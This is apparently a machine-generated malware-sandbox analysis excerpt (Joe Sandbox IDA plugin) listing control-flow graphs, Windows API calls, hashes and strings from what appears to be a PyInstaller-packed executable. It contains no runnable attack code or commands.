                                                                                                                                                                                                                                              control_flow_graph 331 7ff62c0f1950-7ff62c0f198b call 7ff62c0f45c0 334 7ff62c0f1991-7ff62c0f19d1 call 7ff62c0f7f90 331->334 335 7ff62c0f1c4e-7ff62c0f1c72 call 7ff62c0fc550 331->335 340 7ff62c0f1c3b-7ff62c0f1c3e call 7ff62c10004c 334->340 341 7ff62c0f19d7-7ff62c0f19e7 call 7ff62c1006d4 334->341 345 7ff62c0f1c43-7ff62c0f1c4b 340->345 346 7ff62c0f1a08-7ff62c0f1a24 call 7ff62c10039c 341->346 347 7ff62c0f19e9-7ff62c0f1a03 call 7ff62c104f08 call 7ff62c0f2910 341->347 345->335 352 7ff62c0f1a45-7ff62c0f1a5a call 7ff62c104f28 346->352 353 7ff62c0f1a26-7ff62c0f1a40 call 7ff62c104f08 call 7ff62c0f2910 346->353 347->340 361 7ff62c0f1a5c-7ff62c0f1a76 call 7ff62c104f08 call 7ff62c0f2910 352->361 362 7ff62c0f1a7b-7ff62c0f1b05 call 7ff62c0f1c80 * 2 call 7ff62c1006d4 call 7ff62c104f44 352->362 353->340 361->340 375 7ff62c0f1b0a-7ff62c0f1b14 362->375 376 7ff62c0f1b35-7ff62c0f1b4e call 7ff62c10039c 375->376 377 7ff62c0f1b16-7ff62c0f1b30 call 7ff62c104f08 call 7ff62c0f2910 375->377 383 7ff62c0f1b50-7ff62c0f1b6a call 7ff62c104f08 call 7ff62c0f2910 376->383 384 7ff62c0f1b6f-7ff62c0f1b8b call 7ff62c100110 376->384 377->340 383->340 391 7ff62c0f1b9e-7ff62c0f1bac 384->391 392 7ff62c0f1b8d-7ff62c0f1b99 call 7ff62c0f2710 384->392 391->340 395 7ff62c0f1bb2-7ff62c0f1bb9 391->395 392->340 397 7ff62c0f1bc1-7ff62c0f1bc7 395->397 398 7ff62c0f1be0-7ff62c0f1bef 397->398 399 7ff62c0f1bc9-7ff62c0f1bd6 397->399 398->398 400 7ff62c0f1bf1-7ff62c0f1bfa 398->400 399->400 401 7ff62c0f1c0f 400->401 402 7ff62c0f1bfc-7ff62c0f1bff 400->402 404 7ff62c0f1c11-7ff62c0f1c24 401->404 402->401 403 7ff62c0f1c01-7ff62c0f1c04 402->403 403->401 405 7ff62c0f1c06-7ff62c0f1c09 403->405 406 7ff62c0f1c2d-7ff62c0f1c39 404->406 407 7ff62c0f1c26 404->407 405->401 408 7ff62c0f1c0b-7ff62c0f1c0d 405->408 406->340 406->397 407->406 408->404
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F7F90: _fread_nolock.LIBCMT ref: 00007FF62C0F803A
                                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF62C0F1A1B
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62C0F1B6A), ref: 00007FF62C0F295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                              • Opcode ID: 4d37377fcd544e5bc457dd1f94d5fe39e21ec1f5484c8870d358832dbde1365c
                                                                                                                                                                                                                                              • Instruction ID: 71f3631da99adedec12b24781d99b66ab8a29dafd1101ad8d3dea79342d45c8c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d37377fcd544e5bc457dd1f94d5fe39e21ec1f5484c8870d358832dbde1365c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1081D571A0C6868AEF20DB28DC562F923A0EF487A4F404431ED8DC7795DF7DE9858786

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 409 7ff62c0f1600-7ff62c0f1611 410 7ff62c0f1613-7ff62c0f161c call 7ff62c0f1050 409->410 411 7ff62c0f1637-7ff62c0f1651 call 7ff62c0f45c0 409->411 416 7ff62c0f162e-7ff62c0f1636 410->416 417 7ff62c0f161e-7ff62c0f1629 call 7ff62c0f2710 410->417 418 7ff62c0f1682-7ff62c0f169c call 7ff62c0f45c0 411->418 419 7ff62c0f1653-7ff62c0f1681 call 7ff62c104f08 call 7ff62c0f2910 411->419 417->416 425 7ff62c0f169e-7ff62c0f16b3 call 7ff62c0f2710 418->425 426 7ff62c0f16b8-7ff62c0f16cf call 7ff62c1006d4 418->426 433 7ff62c0f1821-7ff62c0f1824 call 7ff62c10004c 425->433 434 7ff62c0f16d1-7ff62c0f16f4 call 7ff62c104f08 call 7ff62c0f2910 426->434 435 7ff62c0f16f9-7ff62c0f16fd 426->435 442 7ff62c0f1829-7ff62c0f183b 433->442 447 7ff62c0f1819-7ff62c0f181c call 7ff62c10004c 434->447 436 7ff62c0f16ff-7ff62c0f170b call 7ff62c0f1210 435->436 437 7ff62c0f1717-7ff62c0f1737 call 7ff62c104f44 435->437 444 7ff62c0f1710-7ff62c0f1712 436->444 448 7ff62c0f1761-7ff62c0f176c 437->448 449 7ff62c0f1739-7ff62c0f175c call 7ff62c104f08 call 7ff62c0f2910 437->449 444->447 447->433 453 7ff62c0f1802-7ff62c0f180a call 7ff62c104f30 448->453 454 7ff62c0f1772-7ff62c0f1777 448->454 461 7ff62c0f180f-7ff62c0f1814 449->461 453->461 457 7ff62c0f1780-7ff62c0f17a2 call 7ff62c10039c 454->457 464 7ff62c0f17a4-7ff62c0f17bc call 7ff62c100adc 457->464 465 7ff62c0f17da-7ff62c0f17e6 call 7ff62c104f08 457->465 461->447 470 7ff62c0f17c5-7ff62c0f17d8 call 7ff62c104f08 464->470 471 7ff62c0f17be-7ff62c0f17c1 464->471 472 7ff62c0f17ed-7ff62c0f17f8 call 7ff62c0f2910 465->472 470->472 471->457 473 7ff62c0f17c3 471->473 476 7ff62c0f17fd 472->476 473->476 476->453
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                              • Opcode ID: e32c62f6317018de790b7a824d362476fee4f00d456471d65ae47693b1d932f0
                                                                                                                                                                                                                                              • Instruction ID: 670ebc5e103c052e2094edc188542366070cb4a3a4dd7a192199f55c72247a30
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e32c62f6317018de790b7a824d362476fee4f00d456471d65ae47693b1d932f0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1851F361B0864796EE10AB299C461B923A0BF44BB4F444131EE0CC77D6DF3DF9A5C346

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F8704
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F870A
                                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F874C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8830: GetEnvironmentVariableW.KERNEL32(00007FF62C0F388E), ref: 00007FF62C0F8867
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF62C0F8889
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C108238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C108251
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2810: MessageBoxW.USER32 ref: 00007FF62C0F28EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                              • Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                              • Instruction ID: 127c8c644071327446e162895d4b684c9f51dfee4e1841e75d0c787e07839a10
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB41D111A1D64248FE11E729AC5A2F91390AF897E0F944131ED0DC77DADF3DE546C30A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 756 7ff62c0f1210-7ff62c0f126d call 7ff62c0fbd80 759 7ff62c0f126f-7ff62c0f1296 call 7ff62c0f2710 756->759 760 7ff62c0f1297-7ff62c0f12af call 7ff62c104f44 756->760 765 7ff62c0f12d4-7ff62c0f12e4 call 7ff62c104f44 760->765 766 7ff62c0f12b1-7ff62c0f12cf call 7ff62c104f08 call 7ff62c0f2910 760->766 771 7ff62c0f1309-7ff62c0f131b 765->771 772 7ff62c0f12e6-7ff62c0f1304 call 7ff62c104f08 call 7ff62c0f2910 765->772 777 7ff62c0f1439-7ff62c0f144e call 7ff62c0fba60 call 7ff62c104f30 * 2 766->777 775 7ff62c0f1320-7ff62c0f1345 call 7ff62c10039c 771->775 772->777 785 7ff62c0f1431 775->785 786 7ff62c0f134b-7ff62c0f1355 call 7ff62c100110 775->786 794 7ff62c0f1453-7ff62c0f146d 777->794 785->777 786->785 792 7ff62c0f135b-7ff62c0f1367 786->792 793 7ff62c0f1370-7ff62c0f1398 call 7ff62c0fa1c0 792->793 797 7ff62c0f139a-7ff62c0f139d 793->797 798 7ff62c0f1416-7ff62c0f142c call 7ff62c0f2710 793->798 799 7ff62c0f1411 797->799 800 7ff62c0f139f-7ff62c0f13a9 797->800 798->785 799->798 802 7ff62c0f13d4-7ff62c0f13d7 800->802 803 7ff62c0f13ab-7ff62c0f13b9 call 7ff62c100adc 800->803 805 7ff62c0f13ea-7ff62c0f13ef 802->805 806 7ff62c0f13d9-7ff62c0f13e7 call 7ff62c119e30 802->806 808 7ff62c0f13be-7ff62c0f13c1 803->808 805->793 807 7ff62c0f13f5-7ff62c0f13f8 805->807 806->805 810 7ff62c0f140c-7ff62c0f140f 807->810 811 7ff62c0f13fa-7ff62c0f13fd 807->811 812 7ff62c0f13c3-7ff62c0f13cd call 7ff62c100110 808->812 813 7ff62c0f13cf-7ff62c0f13d2 808->813 810->785 811->798 815 7ff62c0f13ff-7ff62c0f1407 811->815 812->805 812->813 813->798 815->775
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                              • Opcode ID: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                              • Instruction ID: b5a338b783929cad4779f87220ea5676c707933e2c38f8c04746b14b5e70b0a5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f2f3123d1cabff2ad8e3db6a95d4b235f7cad2490955ba460222a7cf36d71df
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4510322A0C64289EE21AB15EC413BA6291FF857B4F444131EE4EC77C5EF3DE981C706

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62C10F0AA,?,?,-00000018,00007FF62C10AD53,?,?,?,00007FF62C10AC4A,?,?,?,00007FF62C105F3E), ref: 00007FF62C10EE8C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62C10F0AA,?,?,-00000018,00007FF62C10AD53,?,?,?,00007FF62C10AC4A,?,?,?,00007FF62C105F3E), ref: 00007FF62C10EE98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                              • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction ID: e29bd8be6c23f54e85a35f3a29795efa04a20659b168910b71ed527fba9d14ce
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C412222B29A5682EF15CB17AC096752391BF09BF0F884139DD5DC7794EF3CE4558306

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF62C0F3804), ref: 00007FF62C0F36E1
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F3804), ref: 00007FF62C0F36EB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2C9E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2D63
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2C50: MessageBoxW.USER32 ref: 00007FF62C0F2D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                              • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction ID: 4e8cdb5d84c73ba29dae0b0be3486a0f330b31544a968323086ec233db2db0ea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921A761F1CA4285FE309724EC163BA2250BF98374F404132EE5DC25E5EF6DE645C74A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 901 7ff62c10ba5c-7ff62c10ba82 902 7ff62c10ba9d-7ff62c10baa1 901->902 903 7ff62c10ba84-7ff62c10ba98 call 7ff62c104ee8 call 7ff62c104f08 901->903 904 7ff62c10be77-7ff62c10be83 call 7ff62c104ee8 call 7ff62c104f08 902->904 905 7ff62c10baa7-7ff62c10baae 902->905 921 7ff62c10be8e 903->921 924 7ff62c10be89 call 7ff62c10a8e0 904->924 905->904 907 7ff62c10bab4-7ff62c10bae2 905->907 907->904 910 7ff62c10bae8-7ff62c10baef 907->910 913 7ff62c10bb08-7ff62c10bb0b 910->913 914 7ff62c10baf1-7ff62c10bb03 call 7ff62c104ee8 call 7ff62c104f08 910->914 919 7ff62c10bb11-7ff62c10bb17 913->919 920 7ff62c10be73-7ff62c10be75 913->920 914->924 919->920 925 7ff62c10bb1d-7ff62c10bb20 919->925 922 7ff62c10be91-7ff62c10bea8 920->922 921->922 924->921 925->914 928 7ff62c10bb22-7ff62c10bb47 925->928 930 7ff62c10bb49-7ff62c10bb4b 928->930 931 7ff62c10bb7a-7ff62c10bb81 928->931 934 7ff62c10bb4d-7ff62c10bb54 930->934 935 7ff62c10bb72-7ff62c10bb78 930->935 932 7ff62c10bb56-7ff62c10bb6d call 7ff62c104ee8 call 7ff62c104f08 call 7ff62c10a8e0 931->932 933 7ff62c10bb83-7ff62c10bbab call 7ff62c10d5fc call 7ff62c10a948 * 2 931->933 963 7ff62c10bd00 932->963 966 7ff62c10bbc8-7ff62c10bbf3 call 7ff62c10c284 933->966 967 7ff62c10bbad-7ff62c10bbc3 call 7ff62c104f08 call 7ff62c104ee8 933->967 934->932 934->935 936 7ff62c10bbf8-7ff62c10bc0f 935->936 940 7ff62c10bc8a-7ff62c10bc94 call 7ff62c11391c 936->940 941 7ff62c10bc11-7ff62c10bc19 936->941 952 7ff62c10bc9a-7ff62c10bcaf 940->952 953 7ff62c10bd1e 940->953 941->940 945 7ff62c10bc1b-7ff62c10bc1d 941->945 945->940 949 7ff62c10bc1f-7ff62c10bc35 945->949 949->940 954 7ff62c10bc37-7ff62c10bc43 949->954 952->953 958 7ff62c10bcb1-7ff62c10bcc3 GetConsoleMode 952->958 956 7ff62c10bd23-7ff62c10bd43 ReadFile 953->956 954->940 959 7ff62c10bc45-7ff62c10bc47 954->959 961 7ff62c10bd49-7ff62c10bd51 956->961 962 7ff62c10be3d-7ff62c10be46 GetLastError 956->962 958->953 964 7ff62c10bcc5-7ff62c10bccd 958->964 959->940 965 7ff62c10bc49-7ff62c10bc61 959->965 961->962 968 7ff62c10bd57 961->968 971 7ff62c10be48-7ff62c10be5e call 7ff62c104f08 call 7ff62c104ee8 962->971 972 7ff62c10be63-7ff62c10be66 962->972 973 7ff62c10bd03-7ff62c10bd0d call 7ff62c10a948 963->973 964->956 970 7ff62c10bccf-7ff62c10bcf1 ReadConsoleW 964->970 965->940 974 7ff62c10bc63-7ff62c10bc6f 965->974 966->936 967->963 977 7ff62c10bd5e-7ff62c10bd73 968->977 979 7ff62c10bd12-7ff62c10bd1c 970->979 980 7ff62c10bcf3 GetLastError 970->980 971->963 984 7ff62c10bcf9-7ff62c10bcfb call 7ff62c104e7c 972->984 985 7ff62c10be6c-7ff62c10be6e 972->985 973->922 974->940 983 7ff62c10bc71-7ff62c10bc73 974->983 977->973 987 7ff62c10bd75-7ff62c10bd80 977->987 979->977 980->984 983->940 991 7ff62c10bc75-7ff62c10bc85 983->991 984->963 985->973 993 7ff62c10bda7-7ff62c10bdaf 987->993 994 7ff62c10bd82-7ff62c10bd9b call 7ff62c10b674 987->994 991->940 997 7ff62c10be2b-7ff62c10be38 call 7ff62c10b4b4 993->997 998 7ff62c10bdb1-7ff62c10bdc3 993->998 1001 7ff62c10bda0-7ff62c10bda2 994->1001 997->1001 1002 7ff62c10be1e-7ff62c10be26 998->1002 1003 7ff62c10bdc5 998->1003 1001->973 1002->973 1005 7ff62c10bdca-7ff62c10bdd1 1003->1005 1006 7ff62c10be0d-7ff62c10be18 1005->1006 1007 7ff62c10bdd3-7ff62c10bdd7 1005->1007 1006->1002 1008 7ff62c10bdd9-7ff62c10bde0 1007->1008 1009 7ff62c10bdf3 1007->1009 1008->1009 1011 7ff62c10bde2-7ff62c10bde6 1008->1011 1010 7ff62c10bdf9-7ff62c10be09 1009->1010 1010->1005 1012 7ff62c10be0b 1010->1012 1011->1009 1013 7ff62c10bde8-7ff62c10bdf1 1011->1013 1012->1002 1013->1010
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                              • Instruction ID: d5de01b296e57e1315b7a636ad8fd171338d95024b338c194b25237a98fabddb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20C1F322A0C68792EF609B15984A2BD7B50FB81BF4F554131EE4E83791EE7CE865C702

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
